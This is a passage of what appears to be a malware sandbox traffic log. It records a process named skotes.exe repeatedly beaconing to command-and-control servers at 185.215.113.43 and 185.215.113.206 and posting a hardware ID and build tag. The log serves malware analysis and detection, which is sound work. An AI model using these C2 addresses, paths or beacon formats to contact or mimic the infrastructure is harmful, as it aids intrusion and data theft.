Nov 4, 2024 17:36:38.970972061 CET	1236	IN	Data Raw: 15 30 9a 54 2a 91 9e c7 26 97 d7 97 cd 8b 08 b9 c7 2f 66 58 27 98 70 db 11 e9 7c 60 46 a0 e2 52 30 c1 0b 6c bd 29 06 18 e1 e5 33 33 03 15 1c 72 31 9f 9f 28 02 c5 17 4b 63 a5 5c 26 b6 b7 9f 28 ee c8 d4 0c 26 2b 60 74 34 45 e8 0b 27 2f 06 ea 06 6f Data Ascii: 0T*&/fX'p\|`FR0l)33r1(Kc\&(&+`t4E'/opG(>EW)v3({3X'B_}.0RT')fPoA+fP&20Z/'w GQ'?3);eug4j}y&cZ&^1CN+3
Nov 4, 2024 17:36:38.975867987 CET	1236	IN	Data Raw: be 72 3e 72 b9 5f 95 f0 83 89 a5 27 69 b9 65 1f 11 fe 75 3b b5 98 07 29 29 2c f0 30 de dc 7c ce 81 b6 dd 21 7c cf b3 db 95 a6 65 8c 27 d1 fb d7 ad d8 9b a6 ee 29 18 d8 a1 dc ec e9 3b 06 f1 1c 54 2c 88 56 aa d8 42 d8 ec 0b 88 30 92 07 36 94 26 37 Data Ascii: r>r_'ieu;)),0\|!\|e');T,VB06&71Bb8KB7\|{G<+SvYiNht}e`!!EX60#PJyO >@/gTVSr0fstm;yE._E5}Q,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.5	50339	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:38.596534014 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:36:39.512362003 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.5	50346	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:40.212774038 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:36:41.016227961 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59593 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:36:41.020387888 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59593 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:36:41.045650005 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:36:41.169023991 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59594 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:36:41.378274918 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:36:41.505115986 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59594 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.5	50357	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:41.020287991 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 4, 2024 17:36:41.958106995 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:36:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:36:41.961651087 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCF Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 42 43 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 2d 2d 0d 0a Data Ascii: ------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="hwid"EBBC843EB3592398989009------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="build"tale------BGDGHJEHJJDAAAKEBGCF--
Nov 4, 2024 17:36:42.253103018 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:36:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.5	50360	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:41.049853086 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.5	50364	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:41.201972961 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.5	50365	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:41.208703995 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:36:42.124274015 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.5	50366	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:41.513566971 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:36:42.144402027 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1942 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.5	50367	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:43.634001017 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:36:44.553981066 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.5	50368	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:46.092432022 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 4, 2024 17:36:46.987715960 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:36:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:36:46.989973068 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBAKJDGHIIJJKFHCFCA Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 42 43 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 2d 2d 0d 0a Data Ascii: ------AEBAKJDGHIIJJKFHCFCAContent-Disposition: form-data; name="hwid"EBBC843EB3592398989009------AEBAKJDGHIIJJKFHCFCAContent-Disposition: form-data; name="build"tale------AEBAKJDGHIIJJKFHCFCA--
Nov 4, 2024 17:36:47.271531105 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:36:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.5	50369	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:46.182147026 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:36:47.082231998 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.5	50370	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:48.603741884 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:36:49.546977043 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.5	50371	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:51.182116985 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:36:52.108776093 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.5	50372	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:53.627990961 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:36:54.534791946 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.5	50373	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:56.180090904 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:36:57.083767891 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.5	50375	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:58.611675024 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:36:59.613493919 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.5	50378	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:37:01.253184080 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:37:02.199512005 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:37:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.5	50381	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:37:03.721333027 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:37:04.654062033 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:37:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.5	50384	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:37:06.304579020 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:37:07.230232954 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:37:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.5	50387	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:37:07.526093006 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 4, 2024 17:37:08.441518068 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:37:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:37:08.443881989 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHDAFHDHCBFIDGCFIDG Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 42 43 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 2d 2d 0d 0a Data Ascii: 